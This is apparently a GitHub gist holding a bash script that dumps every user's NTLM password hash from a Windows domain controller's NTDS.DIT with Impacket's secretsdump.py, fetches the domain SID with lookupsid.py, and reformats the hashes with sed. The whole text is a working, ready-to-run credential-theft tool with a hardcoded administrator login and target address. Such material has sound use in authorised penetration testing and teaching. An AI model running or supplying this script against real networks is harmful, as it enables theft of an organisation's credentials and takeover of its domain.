@w0ltage
Last active October 7, 2022 02:15
Shell & Python - Dumping Domain Controller Usernames, SID and Password Hashes with Impacket
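#!/bin/bash
# Dumps NTLM hashes and the domain SID from a domain controller with Impacket,
# then rewrites each dumped line as user:<domain SID>-<RID>:<NT hash>.

# Change the hardcoded values in variables before using!
IMPACKET_PATH="$HOME/Github/impacket"
DOMAIN="domain.local"
USERNAME="Administrator"
PASSWORD="AwesomeAdmin16"
IP="10.0.3.100"
OUTPUT_FILENAME="creds"

# The output files contain password hashes: create them readable by the owner only.
umask 077

printf '[ DUMPING DATA FROM NTDS.DIT TO %s.ntds ]\n' "$OUTPUT_FILENAME"
python3 "$IMPACKET_PATH/examples/secretsdump.py" -just-dc-ntlm "$DOMAIN/$USERNAME:$PASSWORD@$IP" -outputfile "$OUTPUT_FILENAME" 1> /dev/null

printf '\n[ DUMPING DOMAIN SID ]'
# grep -E replaces the deprecated egrep; the pattern matches the domain SID (S-1-5-21-...).
SID=$(python3 "$IMPACKET_PATH/examples/lookupsid.py" "$DOMAIN/$USERNAME:$PASSWORD@$IP" | grep -Eo 'S-[0-9]-[0-9]-[0-9]+-[0-9]+-[0-9]+-[0-9]+')
# Stop here if no SID was found; otherwise sed would write malformed lines.
if [ -z "$SID" ]; then
    printf '\n[ COULD NOT DETERMINE DOMAIN SID ]\n' >&2
    exit 1
fi
printf '\n[ DOMAIN SID IS %s ]' "$SID"

printf '\n[ ADDING SID DOMAIN TO THE RID ]'
printf '\n[ DELETING BLANK LM HASHES ]'
printf '\n[ DELETING ::: ]\n'
# 1) prefix the RID (after the first colon) with the domain SID,
# 2) drop the blank LM hash, 3) drop the trailing ":::".
sed "s/:/:$SID-/1;s/:aad3b435b51404eeaad3b435b51404ee//g;s/::://g" "$OUTPUT_FILENAME.ntds" > "formatted_$OUTPUT_FILENAME.ntds"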